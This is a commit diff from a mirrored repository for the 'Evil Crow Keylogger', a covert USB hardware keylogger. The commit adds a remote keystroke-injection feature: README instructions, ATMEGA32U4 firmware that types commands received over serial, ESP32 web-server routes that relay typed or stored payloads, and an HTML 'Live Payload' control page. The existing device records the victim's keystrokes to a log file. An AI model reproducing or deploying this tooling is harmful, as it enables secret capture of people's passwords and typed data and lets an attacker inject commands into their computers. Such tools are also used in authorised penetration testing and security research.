crash.software
Projects
Pull Requests
Issues
Builds
EvilCrow-Keylogger
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY EvilCrow-Keylogger Commits d35da5fd
🤬
  • ■ ■ ■ ■ ■ ■
    README.md
    skipped 205 lines
    206 206   
    207 207  **File:** log.txt
    208 208   
     209 +## Keystroke Injection
     210 + 
     211 +Keystroke injection attacks can me executed by navigating to the Live Payload tab. There you can write and run keystroke injection payloads written in simple script.
     212 + 
     213 +The parameters allowed to create payloads are the following:
     214 + 
     215 +* **print:** Example print Hello World
     216 + 
     217 +* **println:** Example println Hello World
     218 + 
     219 +* **press:** Example press 131 (This is the GUI key)
     220 + 
     221 +* **release:** Example release
     222 + 
     223 +* **rawpress:** Example rawpress 176 (This is the RETURN key)
     224 + 
     225 +* **delay:** Example delay 3000
     226 + 
     227 +To press more keys and modifiers you can use the following link: https://www.arduino.cc/reference/es/language/functions/usb/keyboard/keyboardmodifiers/
     228 + 
     229 +**Payload example:**
     230 + 
     231 +![Log](https://github.com/joelsernamoreno/EvilCrow-Keylogger/blob/master/images/payload.PNG)
     232 + 
    209 233  # Unbrick Evil Crow Keylogger with Hall Sensor
    210 234   
    211 235  First, you’ll need to set the serial port to the bootloader. But that port is only visible when the board is in bootloader mode, so pull the reset line low twice quickly to invoke the bootloader reset feature. You can quickly press the reset button** twice. While the Evil Crow Keylogger is in the bootloader mode, change the ‘Tools > Serial Port’ menu to the bootloader COM port. Quick! You’ve only got eight seconds.
    skipped 13 lines
  • ■ ■ ■ ■ ■ ■
    code/ATMEGA32U4/ATMEGA32U4.ino
    skipped 28 lines
    29 29  uint8_t modifiers=0;
    30 30  uint8_t modifiersard=0;
    31 31  int key_modifier;
     32 +String cmd;
     33 +char Command[255];
     34 +String tmp_key;
    32 35   
    33 36  File SDlog;
    34 37   
    skipped 27 lines
    62 65  };
    63 66   
    64 67  void KbdRptParser::OnKeyUp(uint8_t mod, uint8_t key) {
    65  - Keyboard.rawrelease(key, 0);
     68 + //Keyboard.rawrelease(key, 0);
     69 + Keyboard.releaseAll();
    66 70   SetModifiersArd();
    67 71   key_modifier = key|modifiersard,HEX;
    68 72   SDlog = SD.open("log.txt", FILE_WRITE);
    skipped 12 lines
    81 85   Keyboard.rawpress(key, modifiers);
    82 86  }
    83 87   
     88 +char ProcessCommand() {
     89 +
     90 + // Release (example: release)
     91 + if(cmd.startsWith("release")) {
     92 + Keyboard.releaseAll();
     93 + }
     94 + 
     95 + // Println (example: println Hello World)
     96 + else if(cmd.startsWith("println ")) {
     97 + cmd.toCharArray(Command, cmd.length() + 1);
     98 + Keyboard.println(Command + 8);
     99 + }
     100 + 
     101 + // Print (example: print Hello World)
     102 + else if(cmd.startsWith("print ")) {
     103 + cmd.toCharArray(Command, cmd.length() + 1);
     104 + Keyboard.print(Command + 6);
     105 + }
     106 + 
     107 + // Press (example: press 131) 131 = KEY_LEFT_GUI
     108 + else if(cmd.startsWith("press ")) {
     109 + cmd.toCharArray(Command, cmd.length() + 1);
     110 + tmp_key = Command + 6;
     111 + int keytmp = tmp_key.toInt();
     112 + Keyboard.press(keytmp);
     113 + delay(100);
     114 + }
     115 +
     116 + // RawPress (example: rawpress 131) 131 = KEY_LEFT_GUI
     117 + else if(cmd.startsWith("rawpress ")) {
     118 + cmd.toCharArray(Command, cmd.length() + 1);
     119 + tmp_key = Command + 9;
     120 + int keytmp = tmp_key.toInt();
     121 + Keyboard.press(keytmp);
     122 + delay(100);
     123 + Keyboard.releaseAll();
     124 + }
     125 + 
     126 + // Delay (example: delay 2000)
     127 + else if(cmd.startsWith("delay ")) {
     128 + cmd.toCharArray(Command, cmd.length() + 1);
     129 + delay(atoi(Command + 6));
     130 + }
     131 +}
     132 + 
    84 133  void KbdRptParser::OnControlKeysChanged(uint8_t before, uint8_t after) {
    85 134  
    86 135   MODIFIERKEYS beforeMod;
    skipped 36 lines
    123 172  KbdRptParser Prs;
    124 173   
    125 174  void setup() {
    126  - Serial.begin(115200);
    127  - Serial1.begin(115200);
     175 +
     176 + Serial.begin(38400);
     177 + Serial1.begin(38400);
     178 + delay(500);
    128 179   SD.begin(5);
    129 180  
    130 181   #if !defined(__MIPSEL__)
    skipped 7 lines
    138 189   
    139 190  void loop() {
    140 191   Usb.Task();
     192 + 
     193 + while (Serial1.available()) {
     194 + cmd = Serial1.readStringUntil('\n');
     195 + delay(500);
     196 + ProcessCommand();
     197 + }
    141 198  }
    142 199   
  • ■ ■ ■ ■ ■ ■
    code/ESP32/ESP32.ino
    skipped 3 lines
    4 4  #include <WebServer.h>
    5 5  #include <EEPROM.h>
    6 6  #include "SPIFFS.h"
     7 +#include "livepayload.h"
    7 8   
    8 9  String webString;
     10 +char autopayload[64];
     11 +int DelayLength = 1000;
     12 +int livepayloaddelay;
     13 +char local_IPstr[16];
    9 14   
    10 15  // Config SSID and password
    11 16  const char* ssid = "Keylogger"; // Enter your SSID here
    skipped 1 lines
    13 18   
    14 19  // HTML and CSS style
    15 20  const String HTML_CSS_STYLING = "<html><head><meta charset=\"utf-8\"><title>Evil Crow Keylogger</title><style> body { background-color: #333333; font-family: \"Century Gothic\", Arial; color: white; margin: 20px;}.myButton:link, .myButton:visited {background: linear-gradient(#777777, #444444);color: white;padding: 4px;min-width: 100px;border-radius: 5px;border: 2px solid white;text-align: center;margin-right: 20px;text-decoration: none;display: inline-block;transition: 0.25s;} .myButton:hover, .myButton:active {background: linear-gradient(#888888, #555555);border: 2px solid deepskyblue;border-radius: 10px;transform: scale(1.15);}</style></head>";
    16  -const String MENU = "<body><p>Evil Crow Keylogger v1.4</p><div id=\"header\"><div id=\"menu\"><ul><a class=\"myButton\" href=\"/viewlog\">View Log</a><a class=\"myButton\" href=\"/delete\">Delete log</a></ul></div></div></style>";
     21 +const String MENU = "<body><p>Evil Crow Keylogger v1.5</p><div id=\"header\"><div id=\"menu\"><ul><a class=\"myButton\" href=\"/\">Menu</a><a class=\"myButton\" href=\"/livepayload\">Live Payload</a><a class=\"myButton\" href=\"/viewlog\">View Log</a><a class=\"myButton\" href=\"/delete\">Delete log</a></ul></div></div></style>";
    17 22   
    18 23  // File
    19 24  File logs;
    skipped 3 lines
    23 28   
    24 29  const bool formatOnFail = true;
    25 30   
     31 +void runpayload() {
     32 + File f = SPIFFS.open(autopayload, "r");
     33 + int defaultdelay = DelayLength;
     34 + int settingsdefaultdelay = DelayLength;
     35 + int custom_delay;
     36 + delay(livepayloaddelay);
     37 + while(f.available()) {
     38 + String line = f.readStringUntil('\n');
     39 + line.replace("&lt;", "<");
     40 + 
     41 + String fullkeys = line;
     42 + int str_len = fullkeys.length()+1;
     43 + char keyarray[str_len];
     44 + fullkeys.toCharArray(keyarray, str_len);
     45 + 
     46 + char *i;
     47 + String cmd;
     48 + String cmdinput;
     49 + cmd = String(strtok_r(keyarray," ",&i));
     50 +
     51 + delay(DelayLength);
     52 + DelayLength = defaultdelay;
     53 + }
     54 + f.close();
     55 + DelayLength = settingsdefaultdelay;
     56 +}
     57 + 
    26 58  void setup() {
    27  - Serial.begin(115200);
     59 + Serial.begin(38400);
    28 60   delay(500);
    29 61   WiFi.mode(WIFI_AP);
    30 62   WiFi.softAP(ssid, password);
    skipped 5 lines
    36 68   
    37 69   server.on("/", []() {
    38 70   server.send(200, "text/html", HTML_CSS_STYLING + MENU);
     71 + });
     72 + 
     73 + server.on("/livepayload", []() {
     74 + server.send_P(200, "text/html", LivePayload);
     75 + });
     76 + 
     77 + server.on("/runlivepayload", [](){
     78 + String livepayload;
     79 + livepayload += server.arg("livepayload");
     80 + if (server.hasArg("livepayloadpresent")) {
     81 + //server.send(200, "text/html", "<pre>Running live payload: <br>"+livepayload+"</pre>");
     82 + char* splitlines;
     83 + int payloadlen = livepayload.length()+1;
     84 + char request[payloadlen];
     85 + livepayload.toCharArray(request,payloadlen);
     86 + splitlines = strtok(request,"\r\n");
     87 + int defaultdelay = DelayLength;
     88 + int settingsdefaultdelay = DelayLength;
     89 + int custom_delay;
     90 + delay(livepayloaddelay);
     91 + while(splitlines != NULL)
     92 + {
     93 + String liveline=splitlines;
     94 + liveline.replace("&lt;", "<");
     95 + char *i;
     96 + String cmd;
     97 + String cmdinput;
     98 + cmd = String(strtok_r(splitlines," ",&i));
     99 +
     100 + splitlines = strtok(NULL,"\r\n");
     101 + 
     102 + Serial.println(liveline);
     103 + 
     104 + delay(DelayLength);
     105 + DelayLength = defaultdelay;
     106 + }
     107 + DelayLength = settingsdefaultdelay;
     108 + return 0;
     109 + }
     110 + else {
     111 + server.send(200, "text/html", F("Type or Paste a payload and click \"Run Payload\"."));
     112 + }
     113 + });
     114 + 
     115 + server.on("/dopayload", [](){
     116 + String dopayload;
     117 + dopayload += server.arg(0);
     118 + server.send(200, "text/html", HTML_CSS_STYLING + "<pre><h3>Running payload: "+dopayload+"</h3></pre><br></body></html>");
     119 + File f = SPIFFS.open(dopayload, "r");
     120 + while(f.available()) {
     121 + String line = f.readStringUntil('\n');
     122 + Serial.println(line);
     123 + delay(DelayLength); //delay between lines in payload, I found running it slower works best
     124 + }
     125 + f.close();
    39 126   });
    40 127   
    41 128   server.on("/viewlog", [](){
    skipped 31 lines
  • ■ ■ ■ ■ ■ ■
    code/ESP32/livepayload.h
     1 +const char LivePayload[] PROGMEM = R"=====(
     2 +<!DOCTYPE HTML>
     3 +<html>
     4 +<head>
     5 + <title>BadUsb_PControl</title>
     6 + <meta charset="utf-8">
     7 + <style>
     8 + body {
     9 + background-color: #333333;
     10 + font-family: "Century Gothic", Arial;
     11 + color: white;
     12 + margin: 20px;
     13 + }
     14 + .myButton:link, .myButton:visited {
     15 + background: linear-gradient(#777777, #444444);
     16 + color: white;
     17 + padding: 4px;
     18 + min-width: 100px;
     19 + border-radius: 5px;
     20 + border: 2px solid white;
     21 + text-align: center;
     22 + margin-right: 20px;
     23 + text-decoration: none;
     24 + display: inline-block;
     25 + transition: 0.25s;
     26 + }
     27 + .myButton:hover, .myButton:active {
     28 + background: linear-gradient(#888888, #555555);
     29 + border: 2px solid deepskyblue;
     30 + border-radius: 10px;
     31 + transform:scale(1.15);
     32 + }
     33 + .submitBtn {
     34 + background: linear-gradient(#777777, #444444);
     35 + color: white;
     36 + padding: 4px;
     37 + min-width: 100px;
     38 + border-radius: 2.5px;
     39 + border: 2px solid white;
     40 + text-align: center;
     41 + transition: 0.25s;
     42 + }
     43 + .submitBtn:hover, .submitBtn:active {
     44 + background: linear-gradient(#888888, #555555);
     45 + border: 2px solid deepskyblue;
     46 + }
     47 + .console{
     48 + width: 99%;
     49 + background-color: black;
     50 + color: white;
     51 + font-family: monospace;
     52 + padding: 5px;
     53 + border: 0px;
     54 + }
     55 + </style>
     56 +</head>
     57 +<body>
     58 +<center>
     59 +<div id="header">
     60 + <div id="menu">
     61 + <ul>
     62 + <a class="myButton" href="/">Menu</a>
     63 + <a class="myButton" href="/livepayload">Live Payload</a>
     64 + <a class="myButton" href="/uploadpayload">Upload Payload</a>
     65 + <a class="myButton" href="/viewlog">View Log</a>
     66 + <a class="myButton" href="/delete">Delete Log</a>
     67 + </ul>
     68 + </div>
     69 +</div>
     70 +<hr>
     71 +</center>
     72 +<br>
     73 +<FORM action="/runlivepayload" method="post" id="live" target="iframe">Payload: <br><br>
     74 + <textarea class="console" form="live" rows="4" cols="50" name="livepayload"></textarea>
     75 + <br>
     76 + <br>
     77 + <INPUT type="radio" name="livepayloadpresent" value="1" hidden="1" checked="checked">
     78 + <INPUT class="submitBtn" type="submit" value="Run Payload">
     79 +</form>
     80 +<br>
     81 +<hr>
     82 +<br>
     83 +<iframe style="visibility: hidden;" src="http://" )+local_IPstr+"/runlivepayload" name="iframe"></iframe>
     84 +</body>
     85 +</html>
     86 +)=====";
     87 + 
  • images/payload.PNG
Please wait...
Page is in error, reload to recover